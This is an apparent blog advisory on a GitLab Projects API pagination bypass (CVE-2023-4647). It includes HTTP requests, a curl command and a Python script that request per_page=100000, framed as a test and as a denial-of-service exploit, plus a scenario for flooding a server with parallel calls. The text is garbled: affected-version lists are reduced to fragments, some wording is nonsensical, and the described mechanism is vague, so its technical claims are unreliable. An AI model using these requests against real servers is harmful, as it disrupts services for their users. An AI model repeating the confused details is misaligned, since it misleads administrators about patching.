CVE-2023-4647 - Exploiting GitLab Projects API Pagination Bypass and Potential DoS
If you're running a self-hosted GitLab instance, especially anything from 15.2 up until the patch releases in mid-2023, there's an important security issue you should know about: CVE-2023-4647. This flaw allowed someone to skip the built-in pagination on the Projects API. In simple terms, this could let an attacker request all your projects in one go—potentially slowing down, overwhelming, or even crashing your GitLab server.
Let's break down what this means, how it could be abused, and what you can do about it.
What Is CVE-2023-4647?
The bug is in the Projects API—that’s the part of GitLab that responds to commands like, "Hey, show me all the projects." Normally, to avoid coupling servers, GitLab paginates the API responses. So, if you ask for GET /api/v4/projects, you’d get projects 1–20, then you'd need to ask again for the next 20, and so on.
But: with CVE-2023-4647, attackers figured out a way to *skip* this pagination. That means, instead of 20 projects per request, you could get thousands—or all—at once, which is *not* what the GitLab folks intended!
16.3 to before 16.3.1
If your instance is within the ranges above and hasn't been patched, you're at risk.
"Pagination Skipping"
GitLab has a per_page parameter for their API calls—usually with a maximum of 100. What researchers found is, by manipulating certain parameters or headers, you could bypass this restriction.
Here's how a normal API call looks
GET /api/v4/projects?per_page=20 HTTP/1.1
Host: gitlab.example.com
Private-Token: [YOUR_PERSONAL_ACCESS_TOKEN]
But with the bug, you could try
GET /api/v4/projects?per_page=100000 HTTP/1.1
Host: gitlab.example.com
Private-Token: [YOUR_PERSONAL_ACCESS_TOKEN]
GitLab should cap per_page to 100, but the bug let attackers get *all* projects in a single API hit.
Example: Using curl
curl -H "Private-Token: <YOUR_TOKEN>" \
"https://gitlab.example.com/api/v4/projects?per_page=100000";
On unpatched instances, this could send a huge response, putting strain on the server.
Why Is This Bad? (Potential DoS)
Normally, limiting per-page responses keeps the server comfortable—handling dozens of requests is easier than slamming it with all the data at once. Attackers could abuse this flaw to:
Flood the server with massive requests leading to Denial of Service (DoS)
- Increase CPU/memory usage, making GitLab slow or unresponsive
If you run GitLab on a small virtual machine or under tight hardware, this could even crash the service!
Practical Exploit Scenario: A DoS Attack
Imagine an attacker scripts a few API calls with ultrahigh per_page values—your server tries to pack all project data into each response. Multiply that by a few parallel connections, and your GitLab instance is down for the count.
Here’s a simple way someone could test (or exploit) the bug
import requests
GITLAB_URL = "https://gitlab.example.com";
PRIVATE_TOKEN = "YOUR_TOKEN"
r = requests.get(
f"{GITLAB_URL}/api/v4/projects",
headers={"Private-Token": PRIVATE_TOKEN},
params={"per_page": "100000"}
)
print(r.status_code)
print(r.json())
If this returns *all* your projects, your instance is vulnerable.
Official References
- CVE Detail Page
- GitLab Release Notes & Security Advisory
- HackerOne: Report #2182929
At least to 16.1.5, 16.2.5, or 16.3.1
Monitor Logs
- Check for abnormal requests to /api/v4/projects
Final Thoughts
CVE-2023-4647 is a great reminder that even the little things—like pagination restrictions—can have *big* impacts on security and uptime. If your GitLab is behind, patch now. Don't wait to find out the hard way your server was an easy target for DoS.
Stay updated, stay secure!
*For more details, check out the GitLab official release notes and always watch the NVD advisory for future updates.*
Timeline
Published on: 09/01/2023 11:15:00 UTC
Last modified on: 09/07/2023 20:02:00 UTC